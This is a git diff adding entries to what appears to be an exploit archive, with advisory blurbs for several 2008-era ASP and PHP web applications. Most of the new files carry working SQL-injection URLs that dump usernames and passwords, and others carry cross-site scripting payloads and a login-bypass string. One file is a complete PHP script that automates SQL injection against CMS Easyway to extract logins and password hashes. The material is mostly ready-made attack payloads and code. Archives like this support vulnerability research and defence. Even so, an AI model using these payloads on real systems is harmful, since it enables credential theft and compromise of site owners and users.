diff --git a/files.csv b/files.csv index 1d512090f..9e839ef95 100755 --- a/files.csv +++ b/files.csv @@ -28579,6 +28579,7 @@ id,file,description,date,author,platform,type,port 31786,platforms/asp/webapps/31786.txt,"Cisco BBSM Captive Portal 5.3 'AccesCodeStart.asp' Cross-Site Scripting Vulnerability",2008-05-13,"Brad Antoniewicz",asp,webapps,0 31787,platforms/php/webapps/31787.txt,"Kalptaru Infotech Automated Link Exchange Portal 'linking.page.php' SQL Injection Vulnerability",2008-05-13,HaCkeR_EgY,php,webapps,0 31788,platforms/windows/remote/31788.py,"VideoCharge Studio 2.12.3.685 GetHttpResponse() - MITM Remote Code Execution Exploit",2014-02-20,"Julien Ahrens",windows,remote,0 +31789,platforms/windows/remote/31789.py,"PCMAN FTP 2.07 - Buffer Overflow Exploit",2014-02-20,Sumit,windows,remote,21 31790,platforms/hardware/webapps/31790.txt,"Barracuda Firewall 6.1.0.016 - Multiple Vulnerabilities",2014-02-20,Vulnerability-Lab,hardware,webapps,0 31791,platforms/windows/dos/31791.py,"Catia V5-6R2013 ""CATV5_Backbone_Bus"" - Stack Buffer Overflow",2014-02-20,"Mohamed Shetta",windows,dos,55555 31792,platforms/php/webapps/31792.txt,"Stark CRM 1.0 - Multiple Vulnerabilities",2014-02-20,LiquidWorm,php,webapps,80 @@ -28634,3 +28635,29 @@ id,file,description,date,author,platform,type,port 31843,platforms/asp/webapps/31843.txt,"Excuse Online 'pwd.asp' SQL Injection Vulnerability",2008-05-26,Unohope,asp,webapps,0 31844,platforms/php/webapps/31844.txt,"phpFix 2.0 fix/browse.php kind Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0 31845,platforms/php/webapps/31845.txt,"phpFix 2.0 auth/00_pass.php account Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0 +31846,platforms/php/webapps/31846.txt,"ClassSystem 2.0/2.3 HomepageTop.php teacher_id Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0 +31847,platforms/php/webapps/31847.txt,"ClassSystem 2.0/2.3 HomepageMain.php teacher_id Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0 +31848,platforms/php/webapps/31848.txt,"ClassSystem 2.0/2.3 MessageReply.php teacher_id Parameter SQL Injection",2008-05-26,Unohope,php,webapps,0 +31849,platforms/php/webapps/31849.html,"ClassSystem 2.0/2.3 class/ApplyDB.php Unrestricted File Upload Arbitrary Code Execution",2008-05-26,Unohope,php,webapps,0 +31850,platforms/asp/webapps/31850.txt,"Campus Bulletin Board 3.4 post3/Book.asp review Parameter XSS",2008-05-26,Unohope,asp,webapps,0 +31851,platforms/asp/webapps/31851.txt,"Campus Bulletin Board 3.4 post3/view.asp id Parameter SQL Injection",2008-05-26,Unohope,asp,webapps,0 +31852,platforms/asp/webapps/31852.txt,"Campus Bulletin Board 3.4 post3/book.asp review Parameter SQL Injection",2008-05-26,Unohope,asp,webapps,0 +31853,platforms/windows/remote/31853.py,"Symantec Endpoint Protection Manager Remote Command Execution Exploit",2014-02-23,"Chris Graham",windows,remote,0 +31854,platforms/asp/webapps/31854.html,"The Campus Request Repairs System 1.2 'sentout.asp' Unauthorized Access Vulnerability",2008-05-26,Unohope,asp,webapps,0 +31855,platforms/php/webapps/31855.txt,"Tr Script News 2.1 'news.php' Cross-Site Scripting Vulnerability",2008-05-27,ZoRLu,php,webapps,0 +31856,platforms/windows/dos/31856.html,"CA Internet Security Suite 'UmxEventCli.dll' ActiveX Control Arbitrary File Overwrite Vulnerability",2008-05-28,Nine:Situations:Group,windows,dos,0 +31857,platforms/php/webapps/31857.txt,"Joomla! and Mambo Artists Component 'idgalery' Parameter SQL Injection Vulnerability",2008-05-28,Cr@zy_King,php,webapps,0 +31858,platforms/php/webapps/31858.txt,"Calcium 3.10/4.0.4 'Calcium40.pl' Cross Site Scripting Vulnerability",2008-05-28,"Marvin Simkin",php,webapps,0 +31859,platforms/asp/webapps/31859.txt,"JustPORTAL 1.0 'site' Parameter Multiple SQL Injection Vulnerabilities",2008-05-29,"Ugurcan Engin",asp,webapps,0 +31860,platforms/asp/webapps/31860.txt,"Proje ASP Portal 2.0 'id' Parameter Multiple SQL Injection Vulnerabilities",2008-05-29,"Ugurcan Engin",asp,webapps,0 +31861,platforms/asp/webapps/31861.txt,"dvbbs 8.2 'login.asp' Multiple SQL Injection Vulnerabilities",2008-05-29,hackerbinhphuoc,asp,webapps,0 +31862,platforms/hardware/remote/31862.txt,"Xerox DocuShare 6 dsdn/dsweb/SearchResults URI XSS",2008-05-29,Doz,hardware,remote,0 +31863,platforms/hardware/remote/31863.txt,"Xerox DocuShare 6 dsdn/dsweb/Services/User URI XSS",2008-05-29,Doz,hardware,remote,0 +31864,platforms/hardware/remote/31864.txt,"Xerox DocuShare 6 docushare/dsweb/ServicesLib/Group URI XSS",2008-05-29,Doz,hardware,remote,0 +31865,platforms/asp/webapps/31865.txt,"DotNetNuke 4.8.3 'Default.aspx' Cross-Site Scripting Vulnerability",2008-05-30,"AmnPardaz Security Research Team",asp,webapps,0 +31866,platforms/php/webapps/31866.txt,"TorrentTrader Classic 1.x 'scrape.php' SQL Injection Vulnerability",2008-05-31,"Charles Vaughn",php,webapps,0 +31867,platforms/php/webapps/31867.php,"CMS Easyway 'mid' Parameter SQL Injection Vulnerability",2008-05-30,Lidloses_Auge,php,webapps,0 +31868,platforms/php/webapps/31868.txt,"OtomiGenX 2.2 'userAccount' Parameter SQL Injection Vulnerability",2008-06-02,hadihadi,php,webapps,0 +31869,platforms/asp/webapps/31869.txt,"i-pos Storefront 1.3 'index.asp' SQL Injection Vulnerability",2008-06-02,KnocKout,asp,webapps,0 +31870,platforms/php/webapps/31870.pl,"Joomla! and Mambo Joo!BB 0.5.9 Component 'forum' Parameter SQL Injection Vulnerability",2008-06-02,His0k4,php,webapps,0 +31871,platforms/asp/webapps/31871.txt,"Te Ecard 'id' Parameter Multiple SQL Injection Vulnerabilities",2008-06-02,"Ugurcan Engyn",asp,webapps,0 diff --git a/platforms/asp/webapps/31850.txt b/platforms/asp/webapps/31850.txt new file mode 100755 index 000000000..3fd2ef856 --- /dev/null +++ b/platforms/asp/webapps/31850.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29375/info + +Campus Bulletin Board is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Campus Bulletin Board 3.4 is vulnerable; other versions may also be affected. + +http://www.example.com/post3/Book.asp?review= \ No newline at end of file diff --git a/platforms/asp/webapps/31851.txt b/platforms/asp/webapps/31851.txt new file mode 100755 index 000000000..d1f588985 --- /dev/null +++ b/platforms/asp/webapps/31851.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29375/info + +Campus Bulletin Board is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Campus Bulletin Board 3.4 is vulnerable; other versions may also be affected. + +http://www.example.com/post3/view.asp?id=-99)+union+select+0,uid,password,3,4,5,6,7,8,9,10+from+user+where+1=(1 \ No newline at end of file diff --git a/platforms/asp/webapps/31852.txt b/platforms/asp/webapps/31852.txt new file mode 100755 index 000000000..e64358221 --- /dev/null +++ b/platforms/asp/webapps/31852.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/29375/info + +Campus Bulletin Board is prone to multiple input-validation vulnerabilities, including multiple SQL-injection issues and a cross-site scripting issue, because it fails to sufficiently sanitize user-supplied data. + +Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Campus Bulletin Board 3.4 is vulnerable; other versions may also be affected. + +http://www.example.com/post3/book.asp?review=-99')+union+select+0,password,uid,3,4,5,6,7,8,9,10+from+user+where+1=1+union+select+*+From+公佈欄 +;+Where+'%'=(' \ No newline at end of file diff --git a/platforms/asp/webapps/31854.html b/platforms/asp/webapps/31854.html new file mode 100755 index 000000000..371532b98 --- /dev/null +++ b/platforms/asp/webapps/31854.html @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29376/info + +The Campus Request Repairs System is prone to an unauthorized-access vulnerability because it fails to adequately limit access to administrative scripts used for creating accounts. + +An attacker can exploit this vulnerability to gain unauthorized administrative access to the application; other attacks are also possible. + +The Campus Request Repairs System 1.2 is vulnerable; other versions may also be vulnerable. + +
\ No newline at end of file diff --git a/platforms/asp/webapps/31859.txt b/platforms/asp/webapps/31859.txt new file mode 100755 index 000000000..db8c32cfe --- /dev/null +++ b/platforms/asp/webapps/31859.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/29426/info + +JustPORTAL is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +JustPORTAL 1.0 is vulnerable; other versions may also be affected. + +http://www.example.com/lab/JustPORTALv1.0/panel/videogit.asp?site=1+union+select+0,(sifre),kullaniciadi,3,4,5+from+uyeler +http://www.example.com/lab/JustPORTALv1.0/panel/resimgit.asp?site=1+union+select+0,sifre,kullaniciadi,3,4+from+uyeler +http://www.example.com/lab/JustPORTALv1.0/panel/menugit.asp?site=1+union+select+0,sifre,kullaniciadi+from+uyeler +http://www.example.com/lab/JustPORTALv1.0/panel/habergit.asp?site=1+union+select+0,sifre,kullaniciadi,3,4+from+uyeler \ No newline at end of file diff --git a/platforms/asp/webapps/31860.txt b/platforms/asp/webapps/31860.txt new file mode 100755 index 000000000..ee7975770 --- /dev/null +++ b/platforms/asp/webapps/31860.txt @@ -0,0 +1,27 @@ +source: http://www.securityfocus.com/bid/29427/info + +Proje ASP Portal is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. + +Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Proje ASP Portal 2.0.0 is vulnerable; other versions may also be affected. + +http://www.example.com/portal/yonetici/sayfalar.asp?islem=menuduzenle&id=3+union+select+0,kadi,sifre,3,4,5,6+from+uyeler +http://www.example.com/portal/yonetici/bloklar.asp?islem=bloklar&id=1+union+select+0,sifre,kadi,null,4,5+from+uyeler +http://www.example.com/portal/yonetici/chat.asp?islem=chat&id=1+union+select+0,sifre+from+uyeler +http://www.example.com/portal/yonetici/dostsiteler.asp?islem=dost&id=8+union+select+0,kadi,2,sifre+from+uyeler +http://www.example.com/portal/yonetici/dosya.asp?islem=dosyakategorisiduzenle&id=1+union+select+0,sifre,2,3+from+uyeler +http://www.example.com/portal/yonetici/dosya.asp?islem=dosyakategorisiduzenle&id=1+union+select+0,kadi,2,3+from+uyeler +http://www.example.com/portal/yonetici/haber.asp?islem=haber&id=1+union+select+0,1,2,kadi,sifre,5,6,7,8,9+from+uyeler +http://www.example.com/portal/yonetici/ilan.asp?islem=ilankategorisiduzenle&id=1+union+select+0,sifre,2,3+from+uyeler +http://www.example.com/portal/yonetici/oyun.asp?islem=oyunkategorisiduzenle&id=1+union+select+0,kadi+from+uyeler +http://www.example.com/portal/yonetici/oyun.asp?islem=oyunkategorisiduzenle&id=1+union+select+0,sifre+from+uyeler +http://www.example.com/portal/yonetici/resim.asp?islem=resimkategorisiduzenle&id=1+union+select+0,sifre+from+uyeler +http://www.example.com/portal/yonetici/resim.asp?islem=resimkategorisiduzenle&id=1+union+select+0,kadi+from+uyeler +http://www.example.com/portal/yonetici/toplist.asp?islem=toplistkategoriduzenle&id=1+union+select+0,sifre+from+uyeler +http://www.example.com/portal/yonetici/toplist.asp?islem=toplistkategoriduzenle&id=1+union+select+0,kadi+from+uyeler +http://www.example.com/portal/yonetici/video.asp?islem=videokategorisiduzenle&id=1+union+select+0,sifre+from+uyeler +http://www.example.com/portal/yonetici/video.asp?islem=videokategorisiduzenle&id=1+union+select+0,kadi+from+uyeler +http://www.example.com/portal/yonetici/yazi.asp?islem=yazialtkategoriduzenle&id=1+union+select+0,sifre,2,3+from+uyeler +http://www.example.com/portal/yonetici/yazi.asp?islem=yazialtkategoriduzenle&id=1+union+select+0,kadi,2,3+from+uyeler +http://www.example.com/portal/yonetici/uyeler.asp?islem=uyebilgi&id=1+union+select+0,1,2,3,4,sifre,kadi,7,8,1,1,1,1,1,1,9,1,0,1,1,1,1,1,1+from+uyeler \ No newline at end of file diff --git a/platforms/asp/webapps/31861.txt b/platforms/asp/webapps/31861.txt new file mode 100755 index 000000000..17434afee --- /dev/null +++ b/platforms/asp/webapps/31861.txt @@ -0,0 +1,12 @@ +source: http://www.securityfocus.com/bid/29429/info + +The 'dvbbs' program is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +These issues affect dvbbs 8.2; other versions may also be affected. + +http:///www.example.com/?password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253 +D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25 + + diff --git a/platforms/asp/webapps/31865.txt b/platforms/asp/webapps/31865.txt new file mode 100755 index 000000000..e8b6fd012 --- /dev/null +++ b/platforms/asp/webapps/31865.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29437/info + +DotNetNuke is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +DotNetNuke 4.8.3 is vulnerable; other versions may also be affected. + +http://www.example.com/Default.aspx/"onmouseover="x='al';x=x+'ert(/Soroush Dalili From WWW.BugReport.IR/)';eval(x);alert().aspx http://www.example.com/Default.aspx/bugreport/"onmouseover="var a='.aspx?';document.location='http://www.bugreport.ir/?archive'; \ No newline at end of file diff --git a/platforms/asp/webapps/31869.txt b/platforms/asp/webapps/31869.txt new file mode 100755 index 000000000..137e7893a --- /dev/null +++ b/platforms/asp/webapps/31869.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29471/info + +i-pos Storefront is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +i-pos Storefront 1.3 Beta is vulnerable; other versions may also be affected. + +http://www.example.com/path/index.asp?item=-50+union+select+0,adminid,pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+settings \ No newline at end of file diff --git a/platforms/asp/webapps/31871.txt b/platforms/asp/webapps/31871.txt new file mode 100755 index 000000000..e7aaa4951 --- /dev/null +++ b/platforms/asp/webapps/31871.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/29478/info + +Te Ecard is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. + +Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/victim/lab/tecard/admin/pul.asp?gorev=duzenle&id=1+union+select+0,sifre,2+from+editor +http://www.example.com/victim/lab/tecard/admin/pul.asp?gorev=duzenle&id=1+union+select+0,kullanici_adi,2+from+editor +http://www.example.com/tecard/admin/card.asp?gorev=duzenle&id=99999+union+select+0x31,null,2,3,sifre,5,6,kullanici_adi,5,0+from+editor+where+id=1 +http://www.example.com/lab/tecard/admin/midi.asp?gorev=duzenle&id=1+union+select+0,1,kullanici_adi,3,4,sifre+from+editor +http://www.example.com/lab/tecard/admin/cat.asp?gorev=duzenle&id=1+union+select+kullanici_adi,1,sifre,3,4,5+from+editor +http://www.example.com/lab/tecard/admin/fon.asp?gorev=duzenle&id=1+union+select+0,sifre,2+from+editor +http://www.example.com/lab/tecard/admin/fon.asp?gorev=duzenle&id=1+union+select+0,kullanici_adi,2+from+editor \ No newline at end of file diff --git a/platforms/hardware/remote/31862.txt b/platforms/hardware/remote/31862.txt new file mode 100755 index 000000000..23a9113a8 --- /dev/null +++ b/platforms/hardware/remote/31862.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29430/info + +Xerox DocuShare is prone to multiple cross-site scripting vulnerabilities. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Xerox DocuShare 6 and prior versions are vulnerable. + +http://www.example.com/dsdn/dsweb/SearchResults/XSS \ No newline at end of file diff --git a/platforms/hardware/remote/31863.txt b/platforms/hardware/remote/31863.txt new file mode 100755 index 000000000..a47b24f59 --- /dev/null +++ b/platforms/hardware/remote/31863.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29430/info + +Xerox DocuShare is prone to multiple cross-site scripting vulnerabilities. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Xerox DocuShare 6 and prior versions are vulnerable. + +http://www.example.com/dsdn/dsweb/Services/User-XSS \ No newline at end of file diff --git a/platforms/hardware/remote/31864.txt b/platforms/hardware/remote/31864.txt new file mode 100755 index 000000000..cd64a23c0 --- /dev/null +++ b/platforms/hardware/remote/31864.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29430/info + +Xerox DocuShare is prone to multiple cross-site scripting vulnerabilities. + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Xerox DocuShare 6 and prior versions are vulnerable. + +http://www.example.com/docushare/dsweb/ServicesLib/Group-#/XSS \ No newline at end of file diff --git a/platforms/php/webapps/31846.txt b/platforms/php/webapps/31846.txt new file mode 100755 index 000000000..e17d448b0 --- /dev/null +++ b/platforms/php/webapps/31846.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29372/info + +ClassSystem is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. These issues include multiple SQL-injection vulnerabilities and an arbitrary-file-upload vulnerability. + +Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database. + +ClassSystem 2 and 2.3 are affected; other versions may also be vulnerable. + +http://www.example.com/class/HomepageTop.php?teacher_id=-99'+union+select+0,1,teacher_password,teacher_account,4,5+from+teacher/* \ No newline at end of file diff --git a/platforms/php/webapps/31847.txt b/platforms/php/webapps/31847.txt new file mode 100755 index 000000000..9b9a80f76 --- /dev/null +++ b/platforms/php/webapps/31847.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29372/info + +ClassSystem is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. These issues include multiple SQL-injection vulnerabilities and an arbitrary-file-upload vulnerability. + +Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database. + +ClassSystem 2 and 2.3 are affected; other versions may also be vulnerable. + +http://www.example.com/class/HomepageMain.php?teacher_id=-99'+union+select+0,teacher_account,2,3,4,5,6,7,teacher_password+from+teacher/* \ No newline at end of file diff --git a/platforms/php/webapps/31848.txt b/platforms/php/webapps/31848.txt new file mode 100755 index 000000000..97aa96f0f --- /dev/null +++ b/platforms/php/webapps/31848.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29372/info + +ClassSystem is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. These issues include multiple SQL-injection vulnerabilities and an arbitrary-file-upload vulnerability. + +Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database. + +ClassSystem 2 and 2.3 are affected; other versions may also be vulnerable. + +http://www.example.com/class/MessageReply.php?teacher_id=1&message_id=-99'+union+select+teacher_account,teacher_password,3,4+from+teacher/* \ No newline at end of file diff --git a/platforms/php/webapps/31849.html b/platforms/php/webapps/31849.html new file mode 100755 index 000000000..f9fbe3da7 --- /dev/null +++ b/platforms/php/webapps/31849.html @@ -0,0 +1,14 @@ +source: http://www.securityfocus.com/bid/29372/info + +ClassSystem is prone to multiple input-validation vulnerabilities because it fails to sufficiently sanitize user-supplied data. These issues include multiple SQL-injection vulnerabilities and an arbitrary-file-upload vulnerability. + +Exploiting these issues could allow an attacker to compromise the application, execute arbitrary code, access or modify data, or exploit latent vulnerabilities in the underlying database. + +ClassSystem 2 and 2.3 are affected; other versions may also be vulnerable. + + \ No newline at end of file diff --git a/platforms/php/webapps/31855.txt b/platforms/php/webapps/31855.txt new file mode 100755 index 000000000..455bef68a --- /dev/null +++ b/platforms/php/webapps/31855.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29388/info + +Tr Script News is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. + +Tr Script News 2.1 is vulnerable; other versions may also be affected. + +http://www.example.com/news/news.php?mode=voir&nb=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/31857.txt b/platforms/php/webapps/31857.txt new file mode 100755 index 000000000..b78316677 --- /dev/null +++ b/platforms/php/webapps/31857.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29407/info + +The Artists component for Joomla! and Mambo is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + + +http://www.example.com/index.php?option=com_artist&idgalery=-1+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9+from+jos_users/* + diff --git a/platforms/php/webapps/31858.txt b/platforms/php/webapps/31858.txt new file mode 100755 index 000000000..2f043c6d9 --- /dev/null +++ b/platforms/php/webapps/31858.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/29411/info + +Calcium is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. + +Calcium 4.0.4 and 3.10 are vulnerable; other versions may also be affected. + +http://www.example.com/cgi-bin/Calcium40.pl?Op=ShowIt&CalendarName=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/31866.txt b/platforms/php/webapps/31866.txt new file mode 100755 index 000000000..6219c5598 --- /dev/null +++ b/platforms/php/webapps/31866.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/29451/info + +TorrentTrader Classic is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/scrape.php?info_hash=%22union%20select%201,1,1,1,ip%20from%20users--%20%20%20 \ No newline at end of file diff --git a/platforms/php/webapps/31867.php b/platforms/php/webapps/31867.php new file mode 100755 index 000000000..0c5274010 --- /dev/null +++ b/platforms/php/webapps/31867.php @@ -0,0 +1,61 @@ +source: http://www.securityfocus.com/bid/29461/info + +CMS Easyway is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + + php '.$argv[0].' http://www.site.com 1 +# +############################################################### +'); +if ($argc == 3) { +echo "\nExploiting in progress:"; +$url = $argv[1]; +$source = file_get_contents($url.'/index.php?mid=null+order+by+100/*'); +$errorcount = substr_count($source,'not a valid MySQL'); +$sql = '/index.php?mid=null+union+select+'; +for ($i = 25; $i>=1; $i--) { + $source = file_get_contents($url.'/index.php?mid=null+order+by+'.$i.'/*'); + if (substr_count($source,'not a valid MySQL')!=$errorcount) { + $errorcount2 = $i; + $i = 1; + } +} +for ($j=1; $j<$errorcount2; $j++) { + $sql = $sql.'concat(0x3a3a3a3a3a,login,0x3a3a313a3a,passwort,0x3a3a323a3a),'; +} +$sql = $sql.'concat(0x3a3a3a3a3a,login,0x3a3a313a3a,passwort,0x3a3a323a3a)+from+cms_benutzer+where+id='.$argv[2].'/*'; +$source = file_get_contents($url.$sql); +echo "\n"; +if (strpos($source,'::::')!=0) { + echo 'User: '.substr($source,strpos($source,'::::')+5,strpos($source,'::1::')-strpos($source,'::::')-5)."\n"; + echo 'Hash: '.substr($source,strpos($source,'::1::')+5,strpos($source,'::2::')-strpos($source,'::1::')-5)."\n"; +} else { + echo 'Exploit failed!'."\n"; +} +} else { +echo "\nNot enough arguments!\n"; +} +?> + + diff --git a/platforms/php/webapps/31868.txt b/platforms/php/webapps/31868.txt new file mode 100755 index 000000000..e0ca55ebe --- /dev/null +++ b/platforms/php/webapps/31868.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/29470/info + +OtomiGenX is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +OtomiGenX 2.2 is affected by this issue; other versions may also be vulnerable. + +The following example POST parameters are available to demonstrate this issue: + +userAccount: admin ' or 1=1/* +userPassword: